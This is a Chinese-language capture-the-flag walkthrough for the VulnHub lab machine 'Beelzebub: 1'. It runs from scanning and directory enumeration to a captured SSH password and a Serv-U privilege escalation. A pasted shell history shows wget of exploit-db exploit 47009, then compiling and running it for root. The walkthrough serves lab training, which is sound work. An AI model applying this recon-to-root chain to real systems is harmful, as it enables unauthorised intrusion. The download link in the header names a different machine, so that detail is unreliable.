英文名称：BEELZEBUB: 1中文名称：别西卜：1发布日期：2021 年 9 月 8 日难度：容易描述：您必须尽可能多地枚举，并且不要忘记 Base64。下载地址：https://www.vulnhub.com/entry/empire-breakout,751/

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

1、开机信息，知道用户名（krampus）

开机信息

2、主机发现（192.168.199.146）

主机发现

3、端口扫描（22、80端口）

端口扫描

4、查看web页面

web页面

5、扫描目录dirb http://192.168.199.146/或dirsearch -u http://192.168.199.146/

扫描目录

6、访问index首页

index首页

查看index首页源代码，得到线索

<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->

index首页源代码

7、对 beelzebub 进行md5计算处理└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1d18e1e22becbd915b45e0e655429d487

md5计算

8、尝试访问链接，被301重定向

疑似wordpress站点

9、尝试遍历目录，可以确定就是wordpress站点dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/

遍历目录

10、尝试访问uploads

uploads

点击 talk to valak

签订契约的人有时会试图智取魔鬼，但最终还是失败了。

talk to valak

11、尝试burp分析，拿到密码 M4k3Ad3a1

burp分析

12、尝试ssh登录

ssh登录

13、成功获得普通用户flag

普通flag

14、挖掘线索（.bash_history）krampus@beelzebub:~$ ls -latotal 104drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .drwxr-xr-x 3 root root 4096 Mar 16 2021 ..-rw------- 1 krampus krampus 1407 Mar 20 2021 .bash_historydrwx------ 11 krampus krampus 4096 Mar 20 2021 .cachedrwxrwxrwx 14 krampus krampus 4096 May 26 2020 .configdrwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbusdrwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktopdrwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documentsdrwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloadsdrwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupgdrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthoritydrwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .localdrwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilladrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Musicdrwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profiledrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successfuldrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templatesdrwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts15、查看历史记录krampus@beelzebub:~$ cat .bash_history mysql -u root -pclearsu rootclearlkslsclearnano /etc/hostnano /etc/hostssu rootsu rootrm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip su rootclearexitchmod 0750 html/ifconfigcd /var/lib/mysql/clearlscd wordpress/sudo susu rootclearlscd Desktop/clearlscat user.txt clearuname -asudo -1sudo -iclearuname -asudo -ifind / -prem -u=s -type f 2>/dev/nullfind / -prem -u=s -type f 2>/dev/nullcat /etc/issuesudo -lcdcd ../cd ../../../../clearfind / -prem -u=s -type f 2>/dev/nullcd /usr/local/Serv-U/lscdclearps -auxps -aps -a -U rootps -a -U root | grep 'Serv'ps -U root -aups -U root -au | sort -uclearcd /tmp/clearfind / -prem -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullclearfind / -perm -u=s -type f 2>/dev/nullclearwget https://www.exploit-db.com/download/47009clearlsclearmv 47009 ./exploit.cgcc exploit.c -o exploit./exploit cd ../../../../../../../lscd cdcdgrep -r 'beelzebub'grep -r 'love'cd .local/shareclearlscd Trash/lscat infocd infolsls -lacd ../clearcd ../lsrm -rf Trash/clearsu roothistory -Rhistory -rmysql -u root -pclearsu rootclearlkslsclearnano /etc/hostnano /etc/hostssu rootsu rootrm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip su rootclearexithistoryclearcdclearip linksu rootclearlshistoryclearlscd /tmp/lssu rootexitclear16、根据 .bash_history 中的提示，完成提权，获得root的flag

复现

到此，实验完成～

发布于 2022-08-22 21:46